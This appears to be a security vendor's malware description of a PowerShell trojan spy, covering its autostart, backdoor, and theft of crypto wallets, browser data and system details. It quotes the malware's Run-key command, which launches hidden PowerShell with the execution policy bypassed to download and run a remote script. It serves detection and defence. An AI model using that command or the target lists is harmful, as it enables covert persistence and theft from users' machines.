TrojanSpy.PS1.POWEATER.A

This Trojan Spy arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

It does not have any propagation routine.

It executes commands from a remote malicious user, effectively compromising the affected system. It connects to a website to send and receive information.

However, as of this writing, the said sites are inaccessible.

Arrival Details

This Trojan Spy arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Installation

This Trojan Spy adds the following mutexes to ensure that only one of its copies runs at any one time:

• 62088a7b-ae9f-6776-77a-6e9c921cb48e

Autostart Technique

This Trojan Spy adds the following registry entries to enable its automatic execution at every system startup:

HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Run
Edge Sync = "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command `"& { Invoke-Command -ScriptBlock ([scriptblock]::Create((Invoke-RestMethod -Uri 'https://{BLOCKED}rFixed/$subfolder/payload/remote/general.ps1' ))) -ArgumentList $build, $serverFixed, $subfolder }`""

Propagation

This Trojan Spy does not have any propagation routine.

Backdoor Routine

This Trojan Spy executes the following commands from a remote malicious user:

• Execute Arbitrary Commands

It connects to the following websites to send and receive information:

• https://{BLOCKED}tertoken.com:8081

Information Theft

This Trojan Spy gathers the following data:

• Public IP Address
• IP Address Location
• OS Version
• List of Installed Anti-Virus
• Firewall Status
• Total Uptime of System

Other Details

This Trojan Spy connects to the following URL(s) to get the affected system's IP address:

• https://{BLOCKED}fy.org
• http://{BLOCKED}o.io/$ipAddress/json

It does the following:

• It steals local cryptocurrency wallet information from:
  • Armory
  • Atomic
  • Bitcoin
  • Binance
  • Bytecoin
  • Coinomi
  • Dash
  • Electrum
  • Ethereum
  • Exodus
  • Guarda
  • com.liberty.jaxx
  • Litecoin
  • MyMonero
  • Monero GUI
  • WallerWasabi
  • Zcash
  • Trezor
  • TronLink
  • Trustwallet
  • Metamask
  • Phantom
  • Sollet
  • Keplr
  • Nifty Wallet
  • Zelcore
  • Zephyr
• It steals browser data from:
  • Brave
  • Chrome
  • Chromium
  • Edge
  • EpicPrivacy
  • Iridium
  • Opera
  • OperaGX
  • Vivaldi
  • Yandex
  • Firefox
  • Pale Moon
  • Waterfox
• It steals information from cryptocurrency wallet in browsers:
  • Argent X
  • Binance Chain WAllet
  • BitKeep Wallet
  • BlockWallet
  • Crypto.com
  • Enkrypt
  • Ethos Sui
  • ExodusWeb3
  • Guarda
  • Keplr
  • MathWallet
  • Metamask
  • Metamask2
  • OKX
  • OneKey
  • Phantom
  • Ronin
  • SafePal
  • TokenPocket
  • Ton
  • TronLink
  • Trust Wallet
  • Wombat
  • Zeal
  • Rabby
  • Fireblocks
  • Nifty Wallet
  • Sollet
  • PetraAptos
  • XDEFI
  • Nami
  • TerraStation
  • MartianAptos
  • SuietSui
  • Braavos
  • FewchaMove
  • NiftyWallet
  • BraveWallet
  • EqualWallet
  • BitAppWallet
  • iWallet
  • AtomicWallet
  • MewCx
  • GuildWallet
  • SaturnWallet
  • HarmonyWallet
  • PaliWallet
  • BoltX
  • LiqualityWallet
  • MaiarDeFiWallet
  • TempleWallet
  • Ronin_E
  • Yoroi_E
  • MetaMask_O
• It checks if the affected system has installed the following VPN service:
  • Cisco Systems
  • Palo Alto networks
  • Fortinet
  • OpenVPN
  • WireGuard
• It checks if the current user has admin privileges.

However, as of this writing, the said sites are inaccessible.

It does not exploit any vulnerability.